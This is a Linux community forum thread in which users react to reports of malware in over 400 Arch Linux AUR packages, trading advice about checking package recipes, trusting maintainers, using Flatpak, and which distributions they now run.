Linux

65722 readers

525 users here now

From Wikipedia, the free encyclopedia

Linux is a family of open source Unix-like operating systems based on the Linux kernel, an operating system kernel first released on September 17, 1991 by Linus Torvalds. Linux is typically packaged in a Linux distribution (or distro for short).

Distributions include the Linux kernel and supporting system software and libraries, many of which are provided by the GNU Project. Many Linux distributions use the word "Linux" in their name, but the Free Software Foundation uses the name GNU/Linux to emphasize the importance of GNU software, causing some controversy.

Rules

Posts must be relevant to operating systems running the Linux kernel. GNU/Linux or otherwise.
No misinformation
No NSFW content
No hate speech, bigotry, etc

Related Communities

Community icon by Alpár-Etele Méder, licensed under CC BY 3.0

founded 7 years ago

MODERATORS

AgreeableLandscape@lemmy.ml

nooter692@lemmy.ml

MarcellusDrum@lemmy.ml

cypherpunks@lemmy.ml

cyclohexane@lemmy.ml

d3Xt3r@lemmy.nz

177

Arch Linux's AUR Sees More Than 400 Packages Compromised With Malware (www.phoronix.com)

submitted 16 hours ago by Virual@lemmy.dbzer0.com to c/linux@lemmy.ml

33 comments fedilink hide all child comments

you are viewing a single comment's thread
view the rest of the comments

[–] thingsiplay@lemmy.ml 49 points 16 hours ago* (last edited 13 hours ago) (3 children)

As an user of the AUR, this is devastating news to me. I am also guilty of accepting updates without reading the latest changes, even if yay asks me if I want to. This is a reminder to everyone to only install from the AUR for absolutely necessary stuff only, and only if you trust the maintainer. And to at least have a look if something suspicious is going in with the recent changes in the package recipe. AND to read in the communities and news.

I don't understand why there still no official announcement as a warning from the Archlinux team at https://archlinux.org/news/ . Is there a different place for security news specifically about the AUR to subscribe to? EDIT: https://archlinux.org/news/active-aur-malicious-packages-incident/ They did it, an official message.

[–] chgxvjh@hexbear.net 1 points 1 hour ago

EDIT: https://archlinux.org/news/active-aur-malicious-packages-incident/ They did it, an official message.

I wish they'd actually explain their findings/attack vectors so that people have a chance to stay ahead of this by reading the PKGBUILDs as recommended.

[–] araneae@beehaw.org 5 points 6 hours ago* (last edited 6 hours ago) (1 children)

This is a reminder to everyone to only install from the AUR for absolutely necessary stuff only, and only if you trust the maintainer.

Unfortunately not foolproof either. I have no infected packages that I know of because I happen to be on a new install, but I caught wind of the LAST AUR botnet infiltration and switched to flatpaks or source builds. Since then I drifted back to AUR for convenience. I thought I was being clever only using AUR packages when I could be "sure" the author of the original software package pushed to AUR, and this was easy since devs who build on Arch typically recommend AUR whether they maintain the package or not. Today I found out spoofing package ownership is apparently easy and so is spoofing git credentials.

I was on Endeavour and it was incredible, but I'm not That Power User and I feel like part of the problem. The worst part of all of this is its owing to an influx of users who want the same ease of use they used to enjoy, but in Windows SOP is installing whatever the fuck you want on Internet Explorer and bugging your sysadmin to fix whatever happens. Its probably really hard to be any kind of FOSS developer right now.

[–] thingsiplay@lemmy.ml 3 points 6 hours ago

Yes, definitely not foolproof. This is more of a wake up call to be at least careful and reconsider every single AUR package one has installed. For me, I was lucky too. But in my case it wasn't pure luck that the few AUR packages I have installed aren't affected. See, because since years using the AUR (sparingly! including my own package :D ) I always feared off orphaned packages and removed them as soon as I could. This incident here is proof I was right.

For some stuff I also prefer the Flatpak, because I do not trust everyone on the AUR, as they operate on root rights! When I brought this up on Endeavor, they disliked my opinion (as a fresh user) and the trusted community members there explained to me that the AUR is way more safe than Flatpak, because there is a trust system of upvotes and everyone can flag the packages, and that Flatpak has a wrong sense of security. That is what they told me and totally ignored my issues with AUR... one of the reasons why I do not visit the EndeavourOS community... I digress...

[–] trevor@lemmy.blahaj.zone 36 points 16 hours ago* (last edited 9 hours ago) (3 children)

The fact that the Arch maintainers seem to prefer Reddit over their own fucking news channel is what made me switch from Arch years ago. I got sick of upstream breaking changes fucking my system because they wouldn't notify people through official channels, only to find it later on /r/archlinux 🙄🙄🙄

[–] ramenu@lemmy.ml 1 points 7 hours ago

They made an announcement though

[–] tanka@lemmy.ml 2 points 11 hours ago (1 children)

What are you using now?

After the end of Win10 I moved to arch but I think my week end will be filled with moving again. ^^

[–] trevor@lemmy.blahaj.zone 4 points 9 hours ago

On my desktop, CachyOS 💀

It was years ago when Arch pissed me off, but I couldn't resist Arch-based distros forever. So far, I haven't been burned.

On my laptop, Asahi Linux, which is basically Fedora ARM with a custom kernel. I'd recommend Fedora to most general users.